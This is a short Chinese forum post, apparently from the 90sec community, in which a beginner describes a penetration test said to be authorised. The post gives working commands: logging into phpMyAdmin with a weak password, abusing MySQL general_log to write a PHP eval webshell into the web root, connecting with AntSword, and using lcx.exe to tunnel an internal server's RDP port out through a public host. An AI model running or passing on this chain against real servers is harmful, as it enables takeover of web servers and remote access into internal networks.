我是一个新手,希望来到90sec社区进行学习,然后分享一下自己学习过程中的知识,希望大家能够给一个来90sec学习的机会。
本次渗透有授权,然后是一篇很小白的文章,大佬们轻喷。
在网站点几条链接试试存在注入吗,意料之中,不存在注入点!
扫描器 扫出了phpmyadmin
弱口令进去了
phpmyadmin getshell方法
查看日志状态
show variables like '%general%'; 日志读写是开着的 ON是表示开启OFF表示关闭
要是 general_log OFF 那就用语句SET GLOBAL general_log='on'
开启日志读写
创建文件
SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'
写一句户 SELECT '<?php eval($_POST["cmd"]);?>'
然后就连接蚁剑 拿到了shell肯定试下提权啊
Administrator权限
查看一下ip 是内网ip如何看是不是内网ip
A类:10.0.0.0 到10.255.255.255
B类:172.16.0.0 到172.31.255.255
C类:192.168.0.0 到192.168.255.255
还有个169.254.xxx.xxx 也是
看看开放了什么端口
3389开着 刚开始不知道是内网ip直接连失败去网上找了资料
内网端口转发 --lcx.exe工具转发
被控端执行 lcx.exe -slave (公网ip) 53 172.xxx.xxx 3389 将内网3389端口转发到公网53端口;
本机执行 lcx.exe -listen 53 1234 已经反弹到公网53端口了 //将接收到的53端口反弹到1234端口;
我们本地远程连接127.0.01:1234,就可以访问到内网主机,这样我们就可以远程登陆内网服务器
- 通过
- 未通过
0 投票者